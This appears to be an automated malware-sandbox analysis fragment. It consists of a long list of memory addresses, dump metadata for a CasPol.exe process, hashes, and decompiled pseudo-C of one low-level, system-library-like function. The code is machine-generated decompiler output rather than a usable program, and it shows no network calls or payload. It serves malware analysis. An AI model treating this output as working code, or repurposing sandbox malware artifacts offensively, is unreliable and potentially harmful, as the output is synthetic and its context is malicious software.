                                                                0x01685faa
                                                                0x01685faa
                                                                0x01685fa4
                                                                0x0162ffb8
                                                                0x00000000
                                                                0x0162ffb8
                                                                0x0162ff5b
                                                                0x01630054
                                                                0x01685f3e
                                                                0x01685f3e
                                                                0x0162ff09
                                                                0x00000000
                                                                0x00000000
                                                                0x0162ff0f
                                                                0x0162ff14
                                                                0x01685f47
                                                                0x01685f4d
                                                                0x01685f4d
                                                                0x01685f47
                                                                0x0162ff1c
                                                                0x01630046
                                                                0x01630076
                                                                0x01630078
                                                                0x00000000
                                                                0x01630048
                                                                0x01630048
                                                                0x0163004a
                                                                0x0163004a
                                                                0x00000000
                                                                0x0163004a
                                                                0x0162ff22
                                                                0x0162ff22
                                                                0x0162ff26
                                                                0x01685f56
                                                                0x01685f5c
                                                                0x01685f5c
                                                                0x01685f56
                                                                0x0162ff2e
                                                                0x00000000
                                                                0x0162ff34
                                                                0x0162ff36
                                                                0x01685f65
                                                                0x0162ff3c
                                                                0x0162ff3c
                                                                0x0162ff3c
                                                                0x0162ff3e
                                                                0x00000000
                                                                0x0162ff3e
                                                                0x0162ff2e
                                                                0x0162ff1c
                                                                0x0162fef3
                                                                0x0162fee3
                                                                0x0162f9f9
                                                                0x0162f9f9
                                                                0x0162f9fb
                                                                0x0162f9ff
                                                                0x0162fbd5
                                                                0x01685fb1
                                                                0x01685fb1
                                                                0x0162fbdf
                                                                0x00000000
                                                                0x0162fbe5
                                                                0x0162fbe5
                                                                0x0162fbe8
                                                                0x0162fbed
                                                                0x01685fdf
                                                                0x0162fc01
                                                                0x0162fc01
                                                                0x0162fc04
                                                                0x0162fc09
                                                                0x01685fee
                                                                0x01685ff4
                                                                0x01685ff4
                                                                0x01685fee
                                                                0x0162fc0f
                                                                0x0162fc13
                                                                0x0162fc1d
                                                                0x0162fc20
                                                                0x0162fc23
                                                                0x0162fc26
                                                                0x0162fc2b
                                                                0x01685ffd
                                                                0x01686003
                                                                0x01686003
                                                                0x01685ffd
                                                                0x0162fc33
                                                                0x00000000
                                                                0x0162fc39
                                                                0x0162fc3b
                                                                0x0162fc3e
                                                                0x0162fc41
                                                                0x0162fc46
                                                                0x0168600c
                                                                0x01686012
                                                                0x01686012
                                                                0x0168600c
                                                                0x0162fc4e
                                                                0x00000000
                                                                0x0162fc54
                                                                0x0162fc54
                                                                0x0162fc59
                                                                0x0168601b
                                                                0x01686021
                                                                0x01686021
                                                                0x0168601b
                                                                0x0162fc61
                                                                0x00000000
                                                                0x0162fc67
                                                                0x0162fc6a
                                                                0x0162fc6f
                                                                0x0168602a
                                                                0x01686030
                                                                0x01686030
                                                                0x0168602a
                                                                0x0162fc77
                                                                0x00000000
                                                                0x0162fc7d
                                                                0x0162fc7f
                                                                0x0162fc81
                                                                0x0162fc85
                                                                0x0162fc87
                                                                0x0162fc87
                                                                0x0162fc8c
                                                                0x0162fc8f
                                                                0x0162fc94
                                                                0x01686039
                                                                0x0162fc9c
                                                                0x0162fca4
                                                                0x0162fcaa
                                                                0x0162fcaf
                                                                0x01686046
                                                                0x0162fcbd
                                                                0x0162fcbf
                                                                0x0168606d
                                                                0x01686073
                                                                0x01686073
                                                                0x0168606d
                                                                0x0162fcc8
                                                                0x0162fccd
                                                                0x0162fccf
                                                                0x0162fcd3
                                                                0x0162fcd5
                                                                0x0162fcd5
                                                                0x0162fcde
                                                                0x0162fce1
                                                                0x0162fce3
                                                                0x0162fce3
                                                                0x0162fce8
                                                                0x0162fcf0
                                                                0x0162fcf2
                                                                0x0162fcf5
                                                                0x0162fcf7
                                                                0x0162fcff
                                                                0x0162fd02
                                                                0x0162fd06
                                                                0x0162fd11
                                                                0x0162fd14
                                                                0x0162fd17
                                                                0x0168607c
                                                                0x01686082
                                                                0x01686082
                                                                0x0168607c
                                                                0x0162fd1f
                                                                0x00000000
                                                                0x0162fd25
                                                                0x0162fd28
                                                                0x0162fd2d
                                                                0x0168608b
                                                                0x01686091
                                                                0x01686091
                                                                0x0168608b
                                                                0x0162fd35
                                                                0x00000000
                                                                0x0162fd3b
                                                                0x0162fd3e
                                                                0x0162fd43
                                                                0x0168609a
                                                                0x01630016
                                                                0x01630018
                                                                0x00000000
                                                                0x0163001a
                                                                0x0163001a
                                                                0x0162fd82
                                                                0x0162fd84
                                                                0x016860d9
                                                                0x016860df
                                                                0x016860df
                                                                0x016860d9
                                                                0x0162fd8d
                                                                0x0162fd95
                                                                0x0162fd98
                                                                0x0162fd9d
                                                                0x016860e8
                                                                0x00000000
                                                                0x00000000
                                                                0x016860ee
                                                                0x00000000
                                                                0x0162fda3
                                                                0x0162fda3
                                                                0x0162fda5
                                                                0x0162fe8b
                                                                0x0162fe90
                                                                0x0162fe95
                                                                0x016860f7
                                                                0x016860fd
                                                                0x016860fd
                                                                0x016860f7
                                                                0x0162fe9d
                                                                0x00000000
                                                                0x0162fea3
                                                                0x0162fea5
                                                                0x01686106
                                                                0x0162feab
                                                                0x0162feab
                                                                0x0162feab
                                                                0x0162feb2
                                                                0x0162feb5
                                                                0x00000000
                                                                0x0162feb5
                                                                0x0162fe9d
                                                                0x0162fdab
                                                                0x0162fdad
                                                                0x0168610f
                                                                0x01686115
                                                                0x01686115
                                                                0x0168610f
                                                                0x0162fdb6
                                                                0x0162fdbb
                                                                0x0168611e
                                                                0x01686120
                                                                0x0162fdc1
                                                                0x0162fdc1
                                                                0x0162fdc5
                                                                0x0162fdc5
                                                                0x0162fdc7
                                                                0x0162fdcc
                                                                0x0162fdce
                                                                0x0162fdce
                                                                0x0162fdd6
                                                                0x0162fdd8
                                                                0x00000000
                                                                0x0162fdd8
                                                                0x0162fd9d
                                                                0x01630018
                                                                0x016860a0
                                                                0x016860a0
                                                                0x0162fd4b
                                                                0x00000000
                                                                0x00000000
                                                                0x0162fd51
                                                                0x0162fd56
                                                                0x016860a9
                                                                0x016860af
                                                                0x016860af
                                                                0x016860a9
                                                                0x0162fd5e
                                                                0x0162febf
                                                                0x016860b8
                                                                0x0162fec5
                                                                0x0162fec5
                                                                0x0162fec5
                                                                0x0162fec7
                                                                0x00000000
                                                                0x0162fd64
                                                                0x0162fd64
                                                                0x0162fd68
                                                                0x016860c1
                                                                0x016860c7
                                                                0x016860c7
                                                                0x016860c1
                                                                0x0162fd70
                                                                0x00000000
                                                                0x0162fd76
                                                                0x0162fd78
                                                                0x016860d0
                                                                0x0162fd7e
                                                                0x0162fd7e
                                                                0x0162fd7e
                                                                0x0162fd80
                                                                0x00000000
                                                                0x0162fd80
                                                                0x0162fd70
                                                                0x0162fd5e
                                                                0x0162fd35
                                                                0x0162fd1f
                                                                0x0168604c
                                                                0x0168604c
                                                                0x0162fcb7
                                                                0x0162ffc0
                                                                0x0162ffc3
                                                                0x0162ffc6
                                                                0x0162ffcb
                                                                0x01686055
                                                                0x0168605b
                                                                0x0168605b
                                                                0x01686055
                                                                0x0162ffd3
                                                                0x00000000
                                                                0x0162ffd9
                                                                0x0162ffdb
                                                                0x01686064
                                                                0x0162ffe1
                                                                0x0162ffe1
                                                                0x0162ffe1
                                                                0x0162ffe3
                                                                0x0162ffe7
                                                                0x0162ffed
                                                                0x00000000
                                                                0x0162ffed
                                                                0x0162ffd3
                                                                0x00000000
                                                                0x0162fcb7
                                                                0x0168603f
                                                                0x0162fc9a
                                                                0x00000000
                                                                0x0162fc9a
                                                                0x0162fc77
                                                                0x0162fc61
                                                                0x0162fc4e
                                                                0x0162fc33
                                                                0x01685fe5
                                                                0x01685fe5
                                                                0x0162fbf5
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0162fbf5
                                                                0x0162fbdf
                                                                0x0162fa05
                                                                0x0162fa05
                                                                0x0162fa0a
                                                                0x0162fe14
                                                                0x01685fb8
                                                                0x01685fb8
                                                                0x0162fe1e
                                                                0x00000000
                                                                0x0162fe24
                                                                0x00000000
                                                                0x0162fe24
                                                                0x0162fe1e
                                                                0x0162fa10
                                                                0x0162fa10
                                                                0x0162fa15
                                                                0x0162fe29
                                                                0x0162fe2d
                                                                0x0162fe35
                                                                0x0162fe38
                                                                0x0162fe3b
                                                                0x01685fc1
                                                                0x00000000
                                                                0x00000000
                                                                0x01685fc7
                                                                0x0162fe43
                                                                0x0162fe45
                                                                0x00000000
                                                                0x00000000
                                                                0x0162fe4b
                                                                0x0162fe50
                                                                0x01685fd0
                                                                0x01685fd6
                                                                0x01685fd6
                                                                0x01685fd0
                                                                0x0162fe5d
                                                                0x0162fe60
                                                                0x00000000
                                                                0x0162fe60
                                                                0x0162fe41
                                                                0x0162fe41
                                                                0x00000000
                                                                0x0162fa1b
                                                                0x0162fa1b
                                                                0x0162fa1d
                                                                0x0162fa20
                                                                0x00000000
                                                                0x0162fa20
                                                                0x0162fa15
                                                                0x0162f9ed
                                                                0x0162f9ed
                                                                0x00000000
                                                                0x0162f9ed
                                                                0x0162f9cd
                                                                0x0162f9ba
                                                                0x0162f9ba
                                                                0x00000000
                                                                0x0162f9ba
                                                                0x0162fba8
                                                                0x0162fb65
                                                                0x0162fb1d
                                                                0x0162fb23
                                                                0x0162fb26
                                                                0x00000000
                                                                0x0162fb26
                                                                0x0162faf3
                                                                0x0162faf3
                                                                0x00000000
                                                                0x0162faf3
                                                                0x0162fab4
                                                                0x0162fa79
                                                                0x0162fa56
                                                                0x0162fa56
                                                                0x00000000
                                                                0x0162fa56
                                                                0x0162f94d
                                                                0x0162f950
                                                                0x0162f955
                                                                0x01685e79
                                                                0x01685e7f
                                                                0x01685e7f
                                                                0x01685e79
                                                                0x0162f95b
                                                                0x0162f960
                                                                0x01685e88
                                                                0x01685e8a
                                                                0x01685e8a
                                                                0x01685e8e
                                                                0x01685e93
                                                                0x00000000
                                                                0x01685e99
                                                                0x01685e9c
                                                                0x01685e9f
                                                                0x01685ea1
                                                                0x01685ea3
                                                                0x01685ea3
                                                                0x01685ea7
                                                                0x00000000
                                                                0x01685ea7
                                                                0x0162f966
                                                                0x0162f966
                                                                0x0162f96b
                                                                0x01685eb0
                                                                0x01685eb6
                                                                0x01685eb6
                                                                0x01685eb0
                                                                0x0162f973
                                                                0x0162fbc7
                                                                0x0162f9a5
                                                                0x0162f9a5
                                                                0x00000000
                                                                0x0162f979
                                                                0x0162f97d
                                                                0x0162f97f
                                                                0x01685ebf
                                                                0x01685ec5
                                                                0x01685ec5
                                                                0x01685ebf
                                                                0x0162f987
                                                                0x00000000
                                                                0x0162f98d
                                                                0x0162f98d
                                                                0x0162f990
                                                                0x0162f994
                                                                0x0162f997
                                                                0x0162f99f
                                                                0x0162fff7
                                                                0x01630061
                                                                0x01630064
                                                                0x0163006a
                                                                0x01685ece
                                                                0x01685ed0
                                                                0x01685ed0
                                                                0x00000000
                                                                0x01630064
                                                                0x0162fffd
                                                                0x01630000
                                                                0x00000000
                                                                0x01630006
                                                                0x01685ecc
                                                                0x00000000
                                                                0x01685ecc
                                                                0x01630000
                                                                0x00000000
                                                                0x0162f99f
                                                                0x0162f987
                                                                0x0162f973

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                                • Instruction ID: a617948f7882ba45699e7d1095f53b31a0711db4b47a3ce19fb021935ae52a5c
                                                                • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                                • Instruction Fuzzy Hash: E462E532E04A769BDB22CE2CCD4066AFBB1AF45754F1986D9DCA59B342D371D842CF80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F5BA5 Relevance: .6, Instructions: 592COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 88%
                                                                			E016F5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1701178);
				E0167D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E016F4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0166D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E016F5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x17160e8;
								if( *0x17160e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x17160e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01669710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01666DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0166F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0166F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0166F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0166FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0166FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0166F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0166F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
